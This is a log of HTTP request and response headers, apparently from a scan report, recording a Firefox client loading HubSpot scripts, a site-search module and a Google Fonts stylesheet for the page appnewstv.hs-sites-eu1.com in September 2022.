Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.17.6.210
HTTP/2 200 OK
content-type: application/javascript
date: Wed, 14 Sep 2022 10:25:59 GMT
x-amz-replication-status: COMPLETED
last-modified: Wed, 27 Jul 2022 14:35:54 GMT
etag: W/"0d86ec7be24f2dff2308b8edf54c2f32"
x-amz-server-side-encryption: AES256
x-amz-version-id: k79.hN9WG526nViFF800Vr3DxQF_q.yo
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 2f7792bdc67f7953e2dce93aea1bb9ee.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: YLTjijGIrvYs-mnf4m802qhKaeCMPTJPO9kWnGo7DPUFSWw4moWKag==
cf-cache-status: HIT
age: 1709116
expires: Thu, 14 Sep 2023 10:25:59 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g60gJohz0KQU7PGRcnfGp3qWAbFM8Dl6KPjTBEpFnS%2BRdwYYWO715D5rujZTku%2FBRFQhzOoh9GdyXff3jCbDcgKp88fw78i6IF3kK7b66Tu7ZAhIvvO4BEY1KP6ompjLBiMzDkocghY%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74a86bf96c06b50c-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /cos-i18n/static-1.53/bundles/project.js HTTP/1.1 
Host: static.hsappstatic.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.17.6.210
HTTP/2 200 OK
content-type: application/javascript
date: Wed, 14 Sep 2022 10:25:59 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 09 Nov 2021 16:12:42 GMT
etag: W/"61ca66de658cab9587e4636894680d5d"
x-amz-server-side-encryption: AES256
x-amz-version-id: P9ES7sOpFzrLl1QoRwjEAy5outPo5_GO
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 251aba405178d16c89041692c3261a47.cloudfront.net (CloudFront)
x-amz-cf-pop: HEL50-C1
x-amz-cf-id: 34g4n2oNRs8WvBEZGObRDrs6gH3jdmXpAmCs72tfRrSAm6YeuGEZUA==
cf-cache-status: HIT
age: 54607
expires: Thu, 14 Sep 2023 10:25:59 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fafhqoCTlJbt%2BiKRKdL5qVQux%2BOAoBmY%2FlwI%2FEptU1foOpVPNLpKkTuWS0kf%2BEKkpEPsxjNUpIxQkBg0yEWqEbLtkqvajjoKK3iP%2FI1UhJBn1IqKzblhdjtYs2QlefIjuuzx5VzDG7E%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74a86bf96c09b50c-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /hub/-1/hub_generated/module_assets/-2712622/1663012019885/module_-2712622_Site_Search_Input.min.css HTTP/1.1 
Host: cdn2.hubspot.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.242.204
HTTP/2 200 OK
content-type: text/css
x-hs-alternate-content-type: text/plain
date: Wed, 14 Sep 2022 10:25:59 GMT
cf-ray: 74a86bf95bf11c16-OSL
access-control-allow-origin: *
age: 138382
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: W/"c708989561e0cdbfcf996d1b7f47482c"
last-modified: Mon, 12 Sep 2022 19:47:00 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: IAD55-P1
x-amz-meta-created-unix-time-millis: 1663012019885
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bw6Ue2LLAd9SnEh0aM2Ta2v7wsCVfUJSmWh%2BkKwTyD9uTicopZKl58oyFwR8vFmlG3IlGzk0OT6FjeYUae1GsU3pSUd1L5VjU5rN0uwH062xu3wscfn88IToIP9DlNKWXVA%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Roboto:regular,700&display=swap HTTP/1.1 
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 14 Sep 2022 10:25:59 GMT
date: Wed, 14 Sep 2022 10:25:59 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /hub/-1/hub_generated/module_assets/-2712622/1663012019149/module_-2712622_Site_Search_Input.min.js HTTP/1.1 
Host: cdn2.hubspot.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.17.242.204
HTTP/2 200 OK
content-type: text/plain;charset=utf-8
x-hs-alternate-content-type: text/plain
date: Wed, 14 Sep 2022 10:25:59 GMT
cf-ray: 74a86bf95bf31c16-OSL
access-control-allow-origin: *
age: 138382
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: W/"0953d5b1fcbcfc6d9e817b542caf4b9f"
last-modified: Mon, 12 Sep 2022 19:47:00 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: IAD55-P1
x-amz-meta-created-unix-time-millis: 1663012019149
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lyz5VrwUW22si3rYb%2Bc7wde7iVPOpJ7OKDKvvpIcpCvsVptClU4H5%2BeIbXH4%2BEaAK0dSfwrgoncM8tWBiWyjgDe3BtPdIdAHGDHVfTGQKrwdV1q0iCXL7qYKfp%2Fcuspsr8A%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---